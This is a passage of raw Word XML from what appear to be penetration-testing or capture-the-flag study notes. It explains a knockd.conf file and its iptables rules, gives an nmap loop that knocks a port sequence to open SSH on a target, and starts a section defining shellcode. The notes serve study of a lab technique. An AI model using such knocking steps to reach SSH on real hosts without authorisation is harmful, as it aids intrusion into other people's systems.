                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4252913" cy="2290030"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1303"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The bottom picture is just the original picture but in a better format</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036EF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036F0">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Explaining the  </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/knockd.conf </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">file:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036F1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036F2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">TLDR:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Just look at the "openSSH" section and look at the "sequence" which will tell you what sequence to use to open SSH. Once you do that, SSH will open. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036F3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036F4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036F5">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[options]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036F6">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This section sets global options for knockd.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036F7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="887"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">UseSyslog → tells knockd to log events (like knocks detected, commands run) to syslog for system-wide logging.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036F9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036FA">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[openSSH]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036FB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is the named rule block that defines what to do when you want to open SSH.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="501"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sequence = 7469,8475,9842</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> →</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036FD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="501"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The correct sequence of TCP ports you need to "knock" on, in order, to trigger the open command.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036FE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="501"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">seq_timeout = 25 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">→</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036FF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="501"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Maximum allowed time (in seconds) to complete the full knocking sequence. If you take longer, the sequence is invalid.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003700">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="501"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">→</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003701">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="501"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Command to run when the sequence is detected.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003702">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="501"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This inserts (-I) a rule at the top of the INPUT chain to allow (ACCEPT) TCP traffic (-p tcp) from the knocking IP (%IP%) to port 22 (SSH).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003703">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="501"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Effectively: open SSH for the knocking host.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003704">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="501"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tcpflags = syn</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> →</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003705">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="501"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Only count packets with the SYN flag (the first step of a TCP handshake), so random packets or scans don't accidentally trigger it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003706">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003707">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003708">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[closeSSH]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003709">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This defines the sequence to close SSH again.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000370A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="738"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sequence = 9842,8475,7469 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">→</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000370B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="738"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reverse knock sequence to shut SSH back down.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000370C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="738"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">seq_timeout = 25</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> →</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000370D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="738"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Same time limit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000370E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="738"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">→</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000370F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="738"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Command to remove (-D) the firewall rule that was previously inserted, effectively closing SSH.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003710">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="738"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tcpflags = syn </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">→</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003711">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="738"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Same as above, count only SYN packets.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003712">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003713">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003714">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now we can write a bash script to open SSH:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003715">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="198"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">for X in 7469 8475 9842 ; do nmap -Pn — host-timeout 201 — max-retries 0 -p $X $IP; done</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003716">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="198"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Used Nmap to "knock" on those ports in order, sending SYN packets.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003717">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003718">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037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1A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000371B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_da1sy8a0nehd" w:id="493"/>
      <w:bookmarkEnd w:id="493"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Shellcode </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000371C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000371D">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"Shellcode" is a small piece of machine code (binary instructions) that is crafted to be injected and executed on a target system — usually as part of an exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000371E">
      <w:pPr>
